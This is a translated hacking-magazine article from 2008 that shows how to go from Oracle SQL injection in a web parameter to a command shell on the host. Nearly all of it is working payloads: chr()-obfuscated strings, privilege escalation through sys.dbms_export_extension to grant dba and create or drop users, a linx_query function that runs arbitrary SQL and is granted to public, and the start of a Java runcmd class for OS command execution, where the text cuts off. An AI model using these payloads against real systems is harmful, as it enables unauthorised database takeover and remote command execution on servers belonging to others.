Sharp Oracle injection techniques
Originally published in Hacker's Handbook (黑客手册)
linx 2008.1.12
This article introduces a method of obtaining a cmdshell on the host directly through Oracle injection on the web.
All of the demonstrations below were executed in SQL*Plus through the web... 09-06-09
||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
Confirm that the vulnerability exists:
1<>(
select user_id from all_users where username='linxsql'
)
Grant linxsql the CONNECT privilege:
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''
grant connect to linxsql'''';end;'';end;--','sys',0,'1',0) from dual
Delete the account:
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''
drop user linxsql'''';end;'';end;--','sys',0,'1',0) from dual
======================
The following method creates a function linx_query() that can execute multiple statements; on success it returns the value "1". Its privileges are inherited, however, and may amount to nothing more than PUBLIC, so it seems of limited use on its own; if you really need it, consider grant dba to the current user:
1.jsp?id=1 and '1'<>(
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''
create or replace function linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';end;'';end;--','sys',0,'1',0) from dual
) and …
1.jsp?id=1 and '1'<>(
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''grant all on linx_query to public'''';end;'';end;--','sys',0,'1',0) from dual
) and …
1.jsp?id=1 and '1'<>(
select sys.linx_query('select 14554 from dual') from dual
) and …
1.jsp?id=1 and '1'<>(
select sys.linx_query('declare pragma
autonomous_transaction; begin execute immediate ''
select 1 from dual
''; commit; end;') from dual
) and …
Multiple statements:
select sys.linx_query('declare temp varchar2(200); begin select 1 into temp from dual; select 2 into temp from dual; end;') from dual
Create a user (this will not succeed unless the current user has SYSTEM privileges):
select sys.linx_query('declare pragma
autonomous_transaction; begin execute immediate ''
create user linx_query_user identified by linx_query_user
''; commit; end;') from dual
================
The following method first creates the function linx_query(), then creates runcmd2().
1. Create the function
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''
create or replace function linx_query (p
varchar2) return number authid current_user is begin execute immediate
p; return 1; end; '''';end;'';end;--','sys',0,'1',0) from dual;
If you have the privilege, the following statement should run normally:
select sys.linx_query('select 1 from dual') from dual;
Otherwise, run:
select sys.dbms_export_extension.get_domain_index_tables('foo','bar','dbms_output".put(:p1);execute immediate ''declare pragma autonomous_transaction;begin execute immediate ''''
grant dba to 当前的user'''';end;'';end;--','sys',0,'1',0) from dual
2. Create the package
select sys.linx_query('declare pragma
autonomous_transaction; begin execute immediate ''
create or replace and compile java source named "linxutil2" as import java.io.*;public class linxutil2 extends object {public static string runcmd(string args) throws ioexception{bufferedreader myreader= new bufferedre